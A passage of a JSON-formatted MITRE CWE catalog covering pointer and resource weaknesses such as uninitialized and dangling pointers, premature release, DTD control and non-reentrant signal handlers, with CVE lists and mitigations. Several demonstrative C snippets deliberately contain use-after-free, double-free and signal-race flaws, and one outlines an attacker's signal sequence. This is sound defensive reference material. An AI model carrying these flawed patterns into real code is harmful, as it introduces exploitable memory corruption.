JPEG image, leading to out-of-bounds memory access and crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2687"},{"Reference":"CVE-2009-0690","Description":"negative offset leads to out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690"},{"Reference":"CVE-2008-4114","Description":"untrusted offset in kernel","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"},{"Reference":"CVE-2010-2873","Description":"\\"blind trust\\" of an offset value while writing heap memory allows corruption of function pointer,leading to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2873"},{"Reference":"CVE-2010-2866","Description":"negative value (signed) causes pointer miscalculation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2866"},{"Reference":"CVE-2010-2872","Description":"signed values cause incorrect pointer calculation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2872"},{"Reference":"CVE-2007-5657","Description":"values used as pointer offsets","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5657"},{"Reference":"CVE-2010-2867","Description":"a return value from a function is sign-extended if the value is signed, then used as an offset for pointer arithmetic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2867"},{"Reference":"CVE-2009-1097","Description":"portions of a GIF image used as offsets, causing corruption of an object pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097"},{"Reference":"CVE-2008-1807","Description":"invalid numeric field leads to a free of arbitrary memory locations, then code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1807"},{"Reference":"CVE-2007-2500","Description":"large number of elements leads to a free of an arbitrary address","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2500"},{"Reference":"CVE-2008-1686","Description":"array index issue (CWE-129) with negative offset, used to dereference a function pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1686"},{"Reference":"CVE-2010-2878","Description":"\\"buffer seek\\" value - basically an offset?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2878"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"129"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Pointer Arithmetic", Page 277"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"824":{"attr":{"@_ID":"824","@_Name":"Access of Uninitialized Pointer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program accesses or uses a pointer that has not been initialized.","Extended_Description":{"xhtml:p":["If the pointer contains an uninitialized value, then the value might not point to a valid memory location. This could cause the program to read from or write to unexpected memory locations, leading to a denial of service. If the uninitialized pointer is used as a function call, then arbitrary functions could be invoked. If an attacker can influence the portion of uninitialized memory that is contained in the pointer, this weakness could be leveraged to execute code or perform other attacks.","Depending on memory layout, associated memory management behaviors, and program operation, the attacker might be able to influence the contents of the uninitialized pointer, thus gaining more fine-grained control of the memory location to be accessed."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the uninitialized pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the uninitialized pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" (such as NULL) or larger than expected by a read or write operation, then a crash may occur."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the uninitialized pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-0211","Description":"chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211"},{"Reference":"CVE-2009-2768","Description":"Pointer in structure is not initialized, leading to NULL pointer dereference (CWE-476) and system crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2768"},{"Reference":"CVE-2009-1721","Description":"Free of an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1721"},{"Reference":"CVE-2009-1415","Description":"Improper handling of invalid signatures leads to free of invalid pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1415"},{"Reference":"CVE-2009-0846","Description":"Invalid encoding triggers free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846"},{"Reference":"CVE-2009-0040","Description":"Crafted PNG image leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040"},{"Reference":"CVE-2008-2934","Description":"Crafted GIF image leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2007-4682","Description":"Access of uninitialized pointer might lead to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682"},{"Reference":"CVE-2007-4639","Description":"Step-based manipulation: invocation of debugging function before the primary initialization function leads to access of an uninitialized pointer and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4639"},{"Reference":"CVE-2007-4000","Description":"Unchecked return values can lead to a write to an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4000"},{"Reference":"CVE-2007-2442","Description":"zero-length input leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442"},{"Reference":"CVE-2007-1213","Description":"Crafted font leads to uninitialized function pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1213"},{"Reference":"CVE-2006-6143","Description":"Uninitialized function pointer in freed memory is invoked","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6143"},{"Reference":"CVE-2006-4175","Description":"LDAP server mishandles malformed BER queries, leading to free of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4175"},{"Reference":"CVE-2006-0054","Description":"Firewall can crash with certain ICMP packets that trigger access of an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0054"},{"Reference":"CVE-2003-1201","Description":"LDAP server does not initialize members of structs, which leads to free of uninitialized pointer if an LDAP request fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1201"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Variable Initialization", Page 312"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"825":{"attr":{"@_ID":"825","@_Name":"Expired Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid.","Extended_Description":"When a program releases memory, but it maintains a pointer to that memory, then the memory might be re-allocated at a later time. If the original pointer is accessed to read or write data, then this could cause the program to read or modify data that is in use by a different function or process. Depending on how the newly-allocated memory is used, this could lead to a denial of service, information exposure, or code execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Dangling pointer"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the expired pointer is used in a read operation, an attacker might be able to control data read in by the application."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the expired pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" (such as NULL) or larger than expected by a read or write operation, then a crash may occur."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the expired pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-71"},"Intro_Text":"The following code shows a simple example of a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."},{"attr":{"@_Demonstrative_Example_ID":"DX-72"},"Intro_Text":"The following code shows a simple example of a double free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5013","Description":"access of expired memory address leads to arbitrary code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5013"},{"Reference":"CVE-2010-3257","Description":"stale pointer issue leads to denial of service and possibly other consequences","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3257"},{"Reference":"CVE-2008-0062","Description":"Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2007-1211","Description":"read of value at an offset into a structure after the offset is no longer valid","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1211"}]},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"826":{"attr":{"@_ID":"826","@_Name":"Premature Release of Resource During Expected Lifetime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program releases a resource that is still intended to be used by the program itself or another actor.","Extended_Description":{"xhtml:p":["This weakness focuses on errors in which the program should not release a resource, but performs the release anyway. This is different than a weakness in which the program releases a resource at the appropriate time, but it maintains a reference to the resource, which it later accesses. For this weakness, the resource should still be valid upon the subsequent access.","When a program releases a resource that is still being used, it is possible that operations will still be taken on this resource, which may have been repurposed in the meantime, leading to issues similar to CWE-825. Consequences may include denial of service, information exposure, or code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"If the released resource is subsequently reused or reallocated, then a read operation on the original resource might access sensitive data that is associated with a different user or entity."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"When the resource is released, the software might modify some of its structure, or close associated channels (such as a file descriptor). When the software later accesses the resource as if it is valid, the resource might not be in an expected state, leading to resultant errors that may lead to a crash."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Application Data","Modify Memory"],"Note":"When the resource is released, the software might modify some of its structure. This might affect program logic in the sections of code that still assume the resource is active. If the released resource is related to memory and is used in a function call, or points to unexpected data in a write operation, then code execution may be possible upon subsequent accesses."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}},"Notes":{"Note":{"#text":"Under-studied and under-reported as of September 2010. This weakness has been reported in high-visibility software, although the focus has been primarily on memory allocation and de-allocation. There are very few examples of this weakness that are not directly related to memory management, although such weaknesses are likely to occur in real-world software for other types of resources.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}]}},"827":{"attr":{"@_ID":"827","@_Name":"Improper Control of Document Type Definition","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the software to expose files, consume excessive system resources, or execute arbitrary http requests on behalf of the attacker.","Extended_Description":{"xhtml:p":["As DTDs are processed, they might try to read or include files on the machine performing the parsing. If an attacker is able to control the DTD, then the attacker might be able to specify sensitive resources or requests or provide malicious content.","For example, the SOAP specification prohibits SOAP messages from containing DTDs."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"776","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system."},{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"The DTD may cause the parser to consume excessive CPU cycles or memory using techniques such as nested or recursive entity references (CWE-776)."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server\'s trust relationship with other entities."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-2076","Description":"Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-773"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-10-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"828":{"attr":{"@_ID":"828","@_Name":"Signal Handler with Functionality that is not Asynchronous-Safe","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a signal handler that contains code sequences that are not asynchronous-safe, i.e., the functionality is not reentrant, or it can be interrupted.","Extended_Description":{"xhtml:p":["This can lead to an unexpected system state with a variety of potential consequences depending on context, including denial of service and code execution.","Signal handlers are typically intended to interrupt normal functionality of a program, or even other signals, in order to notify the process of an event. When a signal handler uses global or static variables, or invokes functions that ultimately depend on such state or its associated metadata, then it could corrupt system state that is being used by normal functionality. This could subject the program to race conditions or other weaknesses that allow an attacker to cause the program state to be corrupted. While denial of service is frequently the consequence, in some cases this weakness could be leveraged for code execution.","There are several different scenarios that introduce this issue:","Note that in some environments or contexts, it might be possible for the signal handler to be interrupted itself.","If both a signal handler and the normal behavior of the software have to operate on the same set of state variables, and a signal is received in the middle of the normal execution\'s modifications of those variables, the variables may be in an incorrect or corrupt state during signal handler execution, and possibly still incorrect or corrupt upon return."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Invocation of non-reentrant functions from within the handler. One example is malloc(), which modifies internal global variables as it manages memory. Very few functions are actually reentrant.","Code sequences (not necessarily function calls) contain non-atomic use of global variables, or associated metadata or structures, that can be accessed by other functionality of the program, including other signal handlers. Frequently, the same function is registered to handle multiple signals.","The signal handler function is intended to run at most one time, but instead it can be invoked multiple times. This could happen by repeated delivery of the same signal, or by delivery of different signals that have the same handler function (CWE-831)."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":{"xhtml:p":["Eliminate the usage of non-reentrant functionality inside of signal handlers. This includes replacing all non-reentrant library calls with reentrant calls.","Note: This will not always be possible and may require large portions of the software to be rewritten or even redesigned. Sometimes reentrant-safe library alternatives will not be available. Sometimes non-reentrant interaction between the state of the system and the signal handler will be required by design."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"Where non-reentrant functionality must be leveraged within a signal handler, be sure to block or mask signals appropriately. This includes blocking other signals within the signal handler itself that may also leverage the functionality. It also includes blocking all signals reliant upon the functionality when it is being accessed or modified by the normal behaviors of the software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]},{"attr":{"@_Demonstrative_Example_ID":"DX-48"},"Intro_Text":"The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <signal.h>#include <syslog.h>#include <string.h>#include <stdlib.h>void *global1, *global2;char *what;void sh (int dummy) {}int main (int argc,char* argv[]) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",what);free(global2);free(global1);sleep(10);exit(0);","xhtml:br":["","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}}]}},"Body_Text":["However, the following sequence of events may result in a double-free (CWE-415):",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a SIGHUP is delivered to the process"},{"xhtml:div":"sh() is invoked to process the SIGHUP"},{"xhtml:div":"This first invocation of sh() reaches the point where global1 is freed"},{"xhtml:div":"At this point, a SIGTERM is sent to the process"},{"xhtml:div":"the second invocation of sh() might do another free of global1"},{"xhtml:div":"this results in a double-free (CWE-415)"}]}},"This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within \\"Delivering Signals for Fun and Profit\\" [REF-360]."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4109","Description":"Signal handler uses functions that ultimately call the unsafe syslog/malloc/s*printf, leading to denial of service via multiple login attempts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4109"},{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free 